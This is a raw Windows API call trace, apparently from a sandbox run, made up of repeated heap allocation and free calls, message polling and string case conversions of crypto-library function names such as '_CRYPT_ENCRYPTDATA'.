[0198.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0198.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0198.944] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0198.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0198.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0198.945] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0198.945] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0198.945] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xf9ea) returned 0xbea018 [0198.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0198.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0198.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0198.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0198.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0198.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0198.945] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.945] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0198.945] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0198.945] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0198.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0198.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0198.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0198.945] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0198.945] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.945] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0198.945] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0198.945] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0198.945] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0198.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0198.945] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0198.945] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2678 [0198.945] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0198.945] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0198.945] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0198.945] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0198.946] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xf9ea) returned 0xbea018 [0198.946] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0198.946] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2668 [0198.946] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0198.946] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0198.946] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0198.946] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27f8 [0198.946] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0198.946] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0198.946] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0198.946] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2658 [0198.946] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0198.946] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0198.946] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0198.946] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd540 [0198.946] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0198.946] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0198.946] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0198.946] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0198.946] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0198.946] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xf9ea) returned 0xa5f008 [0198.948] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0198.948] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0198.948] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0198.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0198.948] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0198.948] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0198.948] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0198.948] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0198.948] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0198.948] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0198.948] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0198.948] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0198.948] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0198.948] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0198.948] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0198.948] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.948] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0198.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0198.948] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0198.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0198.948] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0198.948] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.948] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0198.948] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0198.948] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0198.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0198.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0198.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0198.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0198.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0198.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0198.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0198.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0198.949] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0198.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0198.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0198.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0198.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c28d8 [0198.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0198.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0198.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0198.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0198.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd810 [0198.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0198.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0198.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0198.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0198.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0198.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0198.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0198.949] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0198.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0198.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0198.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0198.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0198.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0198.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0198.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0198.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0198.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0198.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0198.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0198.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0198.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0198.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0198.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0198.950] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0198.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa548 [0198.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0198.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0198.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0198.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0198.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0198.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0198.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0198.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0198.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0198.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0198.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0198.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0198.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0198.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0198.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0198.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0198.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0198.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0198.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0198.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0198.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0198.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0198.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0198.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0198.951] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0198.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0198.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0198.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0198.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0198.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0198.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0198.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0198.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0198.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0198.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0198.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0198.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0198.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0198.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0198.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0198.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0198.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0198.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0198.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0198.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0198.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0198.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0198.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0198.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0198.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0198.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0198.951] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0198.952] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0198.952] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0198.952] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0198.952] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0198.952] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0198.952] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0198.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0198.952] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0198.952] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0198.952] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0198.952] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0198.952] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0198.952] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0198.952] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9fb8 [0198.952] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0198.952] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0198.952] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0198.952] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0198.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0198.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0198.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0198.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0198.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0198.952] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0198.952] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0198.952] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0198.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0198.952] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0198.953] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0198.953] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0198.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0198.953] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0198.953] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0198.953] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0198.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0198.953] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0198.953] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0198.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0198.953] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0198.953] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0198.953] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0198.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0198.953] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0198.953] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0198.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0198.953] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0198.953] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0198.953] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0198.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0198.953] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0198.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0198.953] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0198.953] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0198.953] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0198.953] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0198.953] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0198.953] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0198.953] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0198.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0198.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0198.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0198.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0198.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 